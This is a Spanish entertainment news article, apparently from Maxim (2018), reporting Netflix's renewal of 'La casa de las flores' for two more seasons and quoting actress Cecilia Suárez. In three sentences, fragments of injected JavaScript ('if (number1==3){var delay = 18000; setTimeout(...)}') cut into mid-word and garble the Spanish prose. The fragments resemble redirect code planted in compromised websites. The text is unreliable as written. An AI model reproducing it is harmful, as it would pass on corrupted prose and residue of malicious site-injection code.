Netflix confirma segunda y tercera temporada de La casa de las flores

    Netflix confirma segunda y tercera temporada de La casa de las flores

    La serie de Manolo Caro aseguró su estadía en la plataforma de streaming, por lo menos hasta 2020.

    Autor: Redacción Maxim 9 octubre, 2018


     

    La marca roja de streaming anunció que La casa de las flores ya aseguró temporadas hasta 2020

     

    A través de sus redes sociales Netflix confirmó una segunda y tercera temporada de La casa de las flores. La serie creada por  Manolo Caro ya aseguró su estadía en la plataforma de streaming, por lo menos hasta 2020.Uno de los mayores aciertos de la marca roja durante 2018,  fue, sin duda esta producción que trasladó el melodrama a un nuevo formato.

    Esta historia se desarrolla en una florería de una disfuncional familia que esconde múltiples secretos. Todo explota cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando el patriarca se da cuenta de que su amante ha muerto de manera repentina, y decide llevar a su descendencia junto a su esposa y familia actual, quienes no sabían de su existencia.

     

     

    Cecilia Suárez interpreta a Paulina de la Mora. Fotografía por Javier Ávila/Netflix.

     

    Si no han visto esta serie, les recomendamos ponerle particular atención al personaje que interpreta Cecilia Suárez , Paulina, quien creemos se lleva las palmas. A propósito de esto, en una entrevista que tuvimos previamente con Cecilia Suárez comentó:

     

    “Es curioso cómo se fue gestandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando el personaje porque eso no estaba en el papel, no era algo con lo que arrancamos, pero fue sucediendo, empezó a pasar, y aproximadamente en el quinto día de filmación, Manolo y yo nos dimos cuenta de que eso estaba pasandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando y tuvimos que tomar una decisión sobre si era ese el rumbo que queríamos tomar, era una elección riesgosa. En ese momento nos detuvimos, nos miramos a los ojos y dijimos ‘¡Va!’”.

     

     

     

     

     

    ¿Qué les parece?

     

    via GIPHY

     

     

    Temas relacionados con esta nota: , , , , ,

La serie de Manolo Caro aseguró su estadía en la plataforma de streaming, por lo menos hasta 2020.